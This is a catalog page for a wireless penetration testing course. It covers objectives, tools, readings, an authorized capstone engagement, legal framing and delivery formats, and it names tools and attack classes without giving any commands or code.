VCA-WIR-101: Wireless Penetration Testing

Course Overview

The course focuses primarily on 802.11 (Wi-Fi) because that is where most authorized wireless-security work happens in small-business and enterprise engagements, but it introduces Bluetooth/BLE and sub-GHz surfaces well enough that graduates can investigate a novel wireless protocol when they encounter one.

Position relative to peer curricula. WIR-101 sits between OffSec OSWP (PEN-210) and SANS GAWN. OSWP's syllabus skews historical (WEP-era content disproportionate to its modern field relevance); GAWN is comprehensive but vendor-tied. WIR-101 weights modern WPA/WPA2/WPA3 + enterprise (802.1X) the way the field actually weights them, adds Bluetooth/BLE + sub-GHz surfaces neither cert covers in depth, and grades on a client-style wireless engagement report. The course's site-survey methodology + RF-coverage-map deliverable also exceed both certs' scope.

Pipeline role: WIR-101 is the wireless specialty alongside PEN-101 in the Pentest Track. Students arrive with networking (NET-101) + security principles (SEC-101) + Python tooling (FND-102) and leave able to scope, conduct, and report an authorized wireless engagement, with the engagement discipline cohorted alongside (or after) PEN-101's IP-network engagement methodology.

What Belt-3 RF/Wireless Track Graduates Recognize

WIR-101 reads paired anchors at intermediate depth: Lyons's Understanding Digital Signal Processing (3rd ed.) plus Wyglinski et al.'s SDR for Engineers (free PDF via Analog Devices) supply the narrative side (the math from the sample upward; the radio chain from the antenna inward), and Marc Lichtman's PySDR plus the GNU Radio Tutorials supply the build-it-yourself side (every DSP chapter runnable in the academy workbench with no local install). ARRL Technician/General/Extra study materials offer a parallel credential pathway. Graduates leave able to discuss the sampling theorem and aliasing as structural properties, the analogue-to-digital boundary moving toward the antenna across radio generations, the WPA-AKA progression (WEP through WPA3-SAE through 5G-AKA) and the attack classes that drove each redesign (KRACK, Dragonblood, IMSI-catcher, FragAttacks), and the named tool families (RTL-SDR, HackRF, GNU Radio, GQRX, Wireshark wireless dissectors).

The teaching method uses paired textbook readings on canonical practitioner texts, with the per-chapter reading guide published as a separate handout (handouts/cross-chapter-wir-101-anchor-reading-guide.md) so the catalog page stays thin. Eleven hands-on labs anchor each module to a measurable artifact (rubber-ducky antenna characterisation, WPA2 handshake capture and crack, sub-GHz protocol classification, BLE GATT enumeration), and the capstone is a five-day simulated wireless engagement against an academy-owned RF testbed. Graduates carry the spectrum-folding mental model, the build-it-yourself PySDR fluency, and the protocol-design-as-historical-progression frame into RF-201 / RF-301 advanced SDR work, into PEN-101's wireless-pentest module, into RE-101's embedded-radio teardowns, and into the OffSec OSWP / SANS GAWN credentials they typically sit within months of WIR-101 completion.

Learning Objectives

step-by-step. Each is measurable against a specific lab or deliverable.

1. Remember. State the four major 802.11 frame types (management / control / data / extension), the WPA/WPA2 four-way-handshake message numbers, the FCC unlicensed-spectrum rules for 2.4 GHz / 5 GHz / sub-GHz ISM, and the difference between SDR receive-only and licensed-transmit operation. (Assessed: midterm closed-book quiz.)
2. Understand. Explain why monitor mode is a hardware-and-driver capability not all NICs support, why antenna gain has direction and polarization, why WPA3-SAE was designed to defeat the offline-cracking attack class, and why open guest networks remain a legitimate engagement finding. (Assessed: D2 reflection; site-survey lab.)
3. Apply. Operate an RF-capable workstation. Wireless NIC in monitor mode, antenna selection by use case, regulatory-compliant transmit operation. (Assessed: Lab 1 + Lab 3.)
4. Apply. Passively observe 802.11 networks; capture management frames, associations, probe requests, handshakes; interpret with Wireshark's 802.11 dissectors. (Assessed: Lab 2 + Lab 3 site survey.)
5. Apply. Identify security posture (open / WEP / WPA-PSK / WPA2-PSK / WPA3-SAE / Enterprise 802.1X) of observed networks; conduct authorized WPA/WPA2 handshake captures + offline password-cracking with aircrack-ng + hashcat + dictionary engineering. (Assessed: Lab 4 + Lab 5.)
6. Apply. Identify + test rogue-AP and evil-twin detection mechanisms; build a karma-attack detector. (Assessed: Lab 7 hardware demo.)
7. Apply. Survey Bluetooth + BLE behavior (advertising, GATT, pairing modes) with btmon, gatttool, an nRF52-class radio; survey sub-GHz (315/433/868/915 MHz) with RTL-SDR + HackRF; classify protocols by waveform family. (Assessed: Lab 8 + Lab 9.)
8. Synthesize / Create. Produce a client-style wireless engagement report. Site map, network inventory, per-network + Bluetooth + sub-GHz findings, remediation; deliver an executive briefing in client-technical-lead context. (Assessed: Capstone, 5-day simulated wireless engagement.)

Week-by-Week Topic Flow

Lab Manifest

Eleven graded labs plus the capstone wireless engagement. Every lab produces an artifact + transcript committed to a private course Git repository.

Bridge to Downstream Courses

WIR-101 is a Pentest-Track specialty. Cross-course threads:

• → PEN-101 (Intro to Pentest). Same engagement-lifecycle scaffold + report format; WIR-101's capstone uses the same client-grade report shape, retargeted to RF surface.
• → ADV-101 (Adversarial Techniques). The captured-handshake + cracked-credential + karma-detector workflows are the substrate ADV-101's wireless-CVE labs build on (when ADV-101 covers a wireless CVE).
• → RE-101 (RE of Embedded Systems). The sub-GHz protocol-recognition skill from Lab 9 is what RE-101 students need to characterize a captured firmware-emission stream; the BLE / GATT enumeration discipline transfers directly to RE work on Bluetooth-attached embedded targets.
• → RE-201 (RE of Burst Radio Signals). WIR-101 is the prereq foundation; RE-201 deepens the SDR + waveform-classification work into adversarial RF reverse-engineering.
• → RF-201 (Intermediate RF: Layer-1 + Layer-2 Protocols + RE Workflows). NEW Part-II elective. Picks up WIR-101's 802.11 + BLE + sub-GHz foundation and goes intermediate-deep on modulation theory, frequency hopping / spread spectrum, LoRa + ZigBee + 802.15.4, IQ-sampling theory, Wireshark RF, and HackRF / bladeRF / ANT-SDR E200 / LimeSDR Mini lab progression. Connects to the RE-track, PT-track, and the SB6141 cable-modem RF stage.
• → RF-301 (Advanced SDR + Waveform RE). NEW Part-II elective. Carrier-grade DSP + cognitive radio + cellular (LTE / 5G NR via OpenAirInterface) + SATCOM + SIGINT + RF waveform RE + anti-jamming / LPI/LPD. The terminal RF-track course.
• → NET-201 + EMB-201 (the SB6141 cable-modem pipeline). WIR-101's sub-GHz + DSP foundation feeds into the embedded-networking lab-target pipeline; NET-201 covers the protocol-stack side, EMB-201 covers the firmware-on-radio side. A student who reaches RE-101 having taken WIR-101 + NET-201 + EMB-201 reads the cable modem's DOCSIS RF stage as a witness to its architecture, not as mysterious bytes.
• → OffSec OSWP / SANS GAWN. Course exceeds both syllabi; students typically sit OSWP within 2-3 months of WIR-101 completion.

Tool Journal: WIR-101 / RF-Track Originating Entries

Per the academy's first-introduce-track-ownership rule, WIR-101 is the canonical originating course for the RF-track tool corpus. Subsequent courses (RF-201, RF-301, RE-201) reference rather than re-introduce these entries; PEN-101's wireless-pentest cross-cuts (aircrack-ng, Hashcat 802.11 modes) inherit the WIR-101 introductions. Tools introduced in WIR-101, with one paragraph each in toolchain-diary.md:

• PySDR (in workbench Tab 1; Pyodide LIVE), the academy's default RF-track delivery; runs Marc Lichtman's PySDR DSP-and-SDR exercises in the browser without local install. Anchored at pysdr.org.
• Python + NumPy + scipy.signal + matplotlib (the DSP-in-Python signal stack). Canonical first-introduce here per cross-track-toolchain-roster; RF-track owns these in their DSP-application form.
• GNU Radio Companion (GRC) + grcc. Canonical SDR-flowgraph IDE; first met Week 9. Pyodide-subset (TIR-4) in engineering for in-browser delivery; full GRC remains an external-install advanced track.
• GQRX (Linux/macOS SDR receiver). Canonical first-introduce here; rf-201 and rf-301 reference.
• SDR# / SDR++ (Windows / cross-platform SDR receivers). Canonical first-introduce here.
• RTL-SDR Blog V4 + osmocom-rtl-sdr. Receive-only software-defined radio; sub-GHz survey workhorse; canonical first-introduce of RTL-SDR community for the academy.
• HackRF One + hackrf_transfer + Ossmann GRC blocks. Transmit-capable SDR; program-supplied for Lab 9 RF-shielded transmit operation; anchored on Ossmann's "Software Defined Radio with HackRF" YouTube series (FREE).
• ANT-SDR E200, the canonical academy lab platform for advanced SDR work; carries forward into rf-201 and rf-301 as the academy primary.
• Inspectrum (offline RF visual analysis). Canonical for protocol RE; introduced Week 9, deepened in rf-201/rf-301.
• Universal Radio Hacker (URH). Canonical wireless-protocol RE suite; native HackRF + bladeRF + LimeSDR + RTL-SDR support; URH-NG fork by PentHertz adds 327-protocol auto-identification + automotive RF crypto toolkit. Introduced Week 9; central in rf-201/rf-301.
• Alfa AWUS036ACH USB Wi-Fi NIC, the practitioner-staple monitor-mode-capable NIC.
• aircrack-ng suite (airodump-ng / airmon-ng / aireplay-ng / aircrack-ng), 802.11 capture, deauth injection, offline cracking. Cross-cut to PT-track adv-101.
• Kismet. Passive 802.11 wireless detector + sniffer + intrusion-detection system; the site-survey staple.
• Wireshark with 802.11 / RF dissectors. Frame-level analysis; the diary entry for Wireshark exists from NET-101 (canonical introduction) but is extended here for 802.11-specific + RF-protocol dissection.
• nRF52840 dongle + btmon + gatttool, Bluetooth + BLE investigation toolset; canonical first-introduce of BLE tooling here.
• Hashcat with WPA/WPA2 modes, PMK / PMKID / handshake offline cracking; PEN-101's hashcat entry (canonical introduction) is extended here for 802.11-specific use.
• ARRL Technician license study materials, FCC Part 97 amateur-radio licensing; the parallel credential pathway. The closest RF-side analogue to PEN-101's OSCP and NET-101's CCNA preparation patterns; ~700K+ US licensees.

Recommended Readings & Practitioner Companions

Primary anchor pair (down-to-earth narrative)

• Richard Lyons, Understanding Digital Signal Processing, 3rd ed. Pearson, 2010 (ISBN 978-0-13-702741-5). The DSP pedagogy canon; IEEE SPS 2012 Educator of the Year. Library-acquire or paperback ~$80-100. WIR-101 reads Ch 1-5 (intro / signals / sampling / DFT / IIR & FIR filters); RF-201 + RF-301 extend.
• Wyglinski, Getz, Collins, Pu, Software-Defined Radio for Engineers. Artech House, 2018 (ISBN 978-1-63081-457-1). FREE PDF via Analog Devices perpetual eBook license: analog.com/.../SDR4Engineers.pdf. Covers RF front-ends + ADCs/DACs + IQ + GNU Radio + ADALM-PLUTO labs.

Primary anchor pair (build-it-yourself; free)

• Marc Lichtman, PySDR: A Guide to SDR and DSP using Python. FREE online at pysdr.org. The one-stop comprehensive entry for software-defined-radio + DSP + Python tooling; cited in GNU Radio's official SuggestedReading.
• GNU Radio Tutorials + GRC flowgraph corpus. First-party docs at wiki.gnuradio.org/Tutorials. Free + open-source (GPL); the canonical SDR-software-radio platform since 2006.

Secondary anchors (supplementary; free)

• Steven W. Smith, The Scientist and Engineer's Guide to Digital Signal Processing. Entirely FREE online at dspguide.com. 1997; fundamentals don't age.
• Michael Ossmann, "Software Defined Radio with HackRF" video series, FREE on YouTube via greatscottgadgets.com/sdr. The HackRF practitioner narrative.
• Bernard Sklar, Digital Communications: Fundamentals and Applications, 3rd ed. Pearson, 2017. For students wanting modulation-and-coding depth; rf-201/rf-301 supplementary.

Practitioner training (parallel credential pathway)

• ARRL Technician / General / Extra licensing. arrl.org/getting-licensed. FCC Part 97 amateur-radio licensing; ~700K+ US licensees. The closest RF parallel to PEN-101's OSCP and NET-101's CCNA. WIR-101 students are positioned to sit Technician within a month of completion.

Prerequisite Map

Depends on: NET-101 (packet + protocol literacy is the substrate WIR-101 retargets to RF) + SEC-101 (security principles) + FND-102 (Python tooling fluency for log + capture analysis).

Feeds into:

• RE-201 (RE of Burst Radio Signals; WIR-101 is the SDR + waveform-classification prereq)
• ADV-101 (concurrent-eligible if PEN-101 is done; wireless-CVE labs benefit from WIR-101)
• OffSec OSWP / SANS GAWN (career-path follow-on)

See the course prerequisite map for the academy-wide map and named track sequences.

Capstone: Simulated Wireless Engagement

A five-day simulated wireless engagement against a Virtus-owned lab space.

Two-tier grading rubric

First, your project must work. The engagement is conducted within stated ROE and FCC regulatory boundaries; site survey + network inventory + per-network security-mode classification are complete; at least one finding (cracked PSK, rogue AP, mis-segmented guest network, exposed BLE service) is documented end-to-end with evidence; the report contains all required sections; the 15-min executive briefing is delivered; technical + non-technical stakeholder questions are answered substantively.

Then we score the report.

• Technical accuracy + RF-discipline (40%). Security-mode classifications correct (no WPA2 mistakenly tagged WPA3); cracked-handshake transcripts reproducible from the evidence appendix; antenna + transmit-power choices respect FCC Part 15; site-survey heatmap reflects actual signal coverage rather than guessed coverage; sub-GHz findings classified to a defensible protocol family.
• Report clarity and craft (30%). Client-grade typesetting; site map is legible; executive summary readable by non-technical client; methodology auditable; spelling + grammar clean; remediation guidance prioritized + concrete (not "improve security").
• Engagement discipline + reflection (30%), ROE respected; transmit operations on shielded / authorized equipment only; OPSEC trade-offs explained (e.g., active probing vs. passive observation); briefing shows the student understands what they would do differently and why.

Submitted artifacts: the full engagement report (PDF, professionally typeset); site-map heatmap; PCAP archive (anonymized where appropriate); cracked-handshake + wordlist archive; 15-min briefing slide deck (~10 slides); one-page lessons-learned memo; private engagement Git repository.

Required Hardware

Per-student kit cost beyond the baseline RE-101 workstation: roughly $140. HackRF One is program-supplied for Week 9.

Legal and Ethical Framework

Wireless work has sharper legal edges than IP-network pen testing because RF emissions propagate past property boundaries by default. The course explicitly addresses FCC regulation, CFAA and state equivalents, engagement boundaries, and directional-survey ethics. Students sign the AUP, maintain per-session authorization logs, and perform all transmit activity on lab-owned, RF-shielded equipment where practical.

Certification Alignment

OffSec OSWP SANS GAWN

Primary alignment, OffSec OSWP (PEN-210). WIR-101 covers more than OSWP requires (Bluetooth/BLE, sub-GHz, site-survey methodology, client-engagement report format). Students who complete WIR-101 are prepared to sit OSWP within 2-3 months.

Secondary alignment, SANS GAWN (GIAC Assessing and Auditing Wireless Networks). Comprehensive but vendor-tied + cost-prohibitive for most students; WIR-101 covers a structurally similar scope at a fraction of GAWN's cost, with the practitioner discipline (engagement methodology + client report) GAWN's exam form does not measure.

Honestly stated: OSWP is not as widely recognized by employers as OSCP or CompTIA PenTest+, and its material skews historical (WEP-era). Virtus teaches WPA/WPA2/WPA3 as primary content because that is what exists in the field; the cert is earned as a side effect by students who choose to sit it.

Pedagogical-vs-vocational stance. The capstone's 5-day wireless engagement + client-grade report + executive briefing exceed what any cert measures. Employers evaluating Virtus Academy graduates should weight the capstone artifact + reproducible engagement repository alongside (or above) the cert.

Format Prescriptions

Hour budget: ~10 lec hr + ~55 lab hr + ~41 indep hr (= ~106 hr total). 11 weeks of curriculum + a 5-day capstone engagement. Wireless lab work assumes FCC-authorised Wi-Fi spectrum + a controlled BLE + sub-GHz test environment.

Live (standard cadence)

2 sessions/wk × 90 min each (45 min lecture + 45 min hands-on per session) + 30 min stay-after office time. 11 weeks + 5-day capstone. Best for college-elective + adult-learning + homeschool-co-op cadence with shared RF lab access.

Night class (working-adult cadence)

1-2 sessions/wk in evenings; spread over ~22 weeks + capstone weekend. Best for community-college + vocational-tech students with day jobs.

Bootcamp

8 hr/day × 5 days/wk = 40 hr/wk; total ~3 weeks (2 weeks of curriculum + 1 week capstone). Best for adults / age-irrelevant students with prereq comfort + dedicated learning time + access to RF lab equipment. Bootcamp format also serves as direct OSWP-prep accelerator.

Async self-paced

Lecture hours via recorded video; lab hours require per-student RF kit (Alfa NIC ~$35-40 + optional RTL-SDR ~$30); indep hours = student pace. Includes Discord-group access (1-2 days/wk instructor-advertised availability). AI-assistant tier add-on. Live 1:1 tutoring premium tier add-on for capstone-engagement coaching + ROE/FCC-compliance review.

High school / homeschool co-op

Adapted live cadence over a school year (~15 weeks at typical school cadence) OR semester (11 weeks at college cadence + capstone). Detailed per-syllabus planning available on request. Note: ROE + FCC compliance instructor sign-off required before any spectrum-active labs.

Interested in VCA-WIR-101?

Email interested@virtuscyberacademy.org with your background and interest.

Email interested@virtuscyberacademy.org